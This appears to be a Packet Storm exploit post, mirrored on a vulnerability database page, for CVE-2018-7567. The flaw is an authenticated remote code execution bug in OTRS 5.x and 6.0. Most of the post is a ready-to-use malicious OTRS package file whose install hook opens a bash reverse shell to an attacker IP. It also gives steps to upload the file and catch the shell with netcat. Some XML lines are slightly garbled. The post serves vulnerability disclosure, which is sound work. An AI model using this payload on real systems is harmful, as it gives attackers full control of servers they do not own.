Lucene search

K
packetstormAli BawazeEerPACKETSTORM:146639
HistoryMar 03, 2018 - 12:00 a.m.

OTRS Command Injection

2018-03-0300:00:00
Ali BawazeEer
packetstormsecurity.com
134

0.004 Low

EPSS

Percentile

73.3%

`# Exploit Title: OTRS Authenticated file upload   
# Date: 03-03-2018  
# Exploit Author: Ali BawazeEer   
# Vendor Homepage: https://www.otrs.com/  
# Software Link: http://ftp.otrs.org/pub/otrs/  
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1  
# Tested on: OTRS 5.0.2/CentOS 7.2.1511  
# CVE : CVE-2018-7567  
  
# Vulnerability Description:   
authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.  
aC/ Proof opm file to upload   
  
<?xml version="1.0" encoding="utf-8" ?>  
<otrs_package version="1.1">  
<Name>MyModule</Name>  
<Version>1.0.0</Version>  
<Vendor>My Module</Vendor>  
<URL>http://otrs.org/</URL>  
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>  
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>  
<Description Lang="en">MyModule</Description>  
<Framework>5.x.x</Framework>  
<BuildDate>2016-09-23 11:17:41</BuildDate>  
<BuildHost>opms.otrs.com</BuildHost>  
<Framework>5.0.x</Framework>  
<IntroInstall Lang="en" Title="My Module" type="pre">  
<br>  
Hello wolrd  
<br>  
((Hello!))  
<br&gt  
</IntroInstall>  
<CodeInstall type="pre">  
print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);  
</CodeInstall>  
<CodeInstall Type="post">  
# create the package name  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};  
$Kernel::OM->Get($ModeModule)-%gt;CodeInstall();  
</CodeInstall>  
<CodeUninstall type="pre">  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};  
$Kernel::OM->Get($CodeModule)->CodeUninstall();  
</CodeUninstall>  
</otrs_package>  
  
  
- Steps:  
- Go to package manager from administrator panel   
- Save the above code in opm file and upload it as package   
- change the ip address to your attacking machine and setup netcat listener   
  
  
  
# =================================================EOF =======================================================  
#  
#  
# Risk : attackers are able to gain full access to the server after uploading malicious opm file   
# and thus have total control over the web server ,   
#  
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server   
#  
# ========================================================  
# [+] Disclaimer  
#  
# Permission is hereby granted for the redistribution of this advisory,  
# provided that it is not altered except by reformatting it, and that due  
# credit is given. Permission is explicitly given for insertion in  
# vulnerability databases and similar, provided that due credit is given to  
# the author. The author is not responsible for any misuse of the information contained   
# herein and prohibits any malicious use of all security related information  
# or exploits by the author or elsewhere.  
#  
#  
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  
  
[+] Exploit by: Ali BawazeEer  
[+] Twitter:@AlibawazeEer  
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer  
`

0.004 Low

EPSS

Percentile

73.3%